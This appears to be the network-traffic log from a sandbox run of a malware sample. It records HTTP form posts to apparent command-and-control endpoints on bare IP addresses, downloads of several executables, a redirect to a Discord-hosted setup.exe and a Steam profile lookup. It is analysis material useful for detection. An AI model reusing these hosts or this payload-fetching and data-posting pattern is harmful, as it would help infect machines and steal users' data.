Network Analysis

GET /demo/home.php?s= HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:13:58 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C795:6752_93878F2E:0050_66693CA6_131A6792:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUCb5sThbEOFRxfw1A87VRlsdE598Iu5FsSb%2BuBjNfWGy2oH9cFBN%2BeFajcCHerbNVR%2FdQ5qltcS3xmzbU2vMEUCRDkE9UL2OJXH58IIiGbVqwXVmCgGYgFw1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8927b2afef927220-FUK alt-svc: h3=":443"; ma=86400

GET /ssl/crt.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: lop.foxesjoy.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:14:05 GMT Content-Type: application/octet-stream Content-Length: 5001510 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=crt.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PmUzSToPcKmG41Aen%2ByqavQn200aGRup3A%2BHwsvzaOB%2BvbqqVKeAkqepJhAAPlOqQ82JvrAPd5BjBTx%2BhK49nncS%2F6ha25bKoS97MTeZDuuqQfcRCCGCQjDihqcDB%2FH3%2Bx0g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8927b2dcfbc87bd1-LAX alt-svc: h3=":443"; ma=86400

GET /profiles/76561199698764354 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 12 Jun 2024 06:15:10 GMT Content-Length: 34815 Connection: keep-alive Set-Cookie: sessionid=db164f98a9ed90526b5ef2fa; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None

GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.99.177

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:13:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 12 Jun 2024 07:13:57 GMT Date: Wed, 12 Jun 2024 06:13:57 GMT Connection: keep-alive

POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 133 Host: 5.42.99.177

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:14:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 3800 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:14:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 02 May 2024 09:42:48 GMT ETag: "ae0000-617756d063600" Accept-Ranges: bytes Content-Length: 11403264 Content-Type: application/x-msdownload

HEAD /d/385135 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 88.218.93.76 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Wed, 12 Jun 2024 06:14:04 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1247509183033770007/1248593382352228403/setup.exe?ex=666a2974&is=6668d7f4&hm=d692fd5637cba8cfe00ba2f8228c4ae2cc8c57691598e6e271ad25368edb33ba&

HEAD /rome/kenzo.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.91.77.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 12 Jun 2024 06:14:04 GMT Content-Type: application/octet-stream Content-Length: 1788416 Last-Modified: Wed, 12 Jun 2024 05:07:05 GMT Connection: keep-alive ETag: "66692cf9-1b4a00" Accept-Ranges: bytes

HEAD /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:14:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=default_file.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 6409728 Content-Type: application/octet-stream

GET /rome/kenzo.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.91.77.80 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 12 Jun 2024 06:14:04 GMT Content-Type: application/octet-stream Content-Length: 1788416 Last-Modified: Wed, 12 Jun 2024 05:07:05 GMT Connection: keep-alive ETag: "66692cf9-1b4a00" Accept-Ranges: bytes

GET /d/385135 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 88.218.93.76 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Wed, 12 Jun 2024 06:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1247509183033770007/1248593382352228403/setup.exe?ex=666a2974&is=6668d7f4&hm=d692fd5637cba8cfe00ba2f8228c4ae2cc8c57691598e6e271ad25368edb33ba&

GET /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:14:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=default_file.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 6409728 Content-Type: application/octet-stream

GET /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:14:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 02 May 2024 09:42:48 GMT ETag: "ae0000-617756d063600" Accept-Ranges: bytes Content-Length: 11403264 Content-Type: application/x-msdownload

POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 517 Host: 5.42.99.177

HTTP/1.1 200 OK Date: Wed, 12 Jun 2024 06:15:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 12 Jun 2024 07:15:08 GMT Date: Wed, 12 Jun 2024 06:15:08 GMT Connection: keep-alive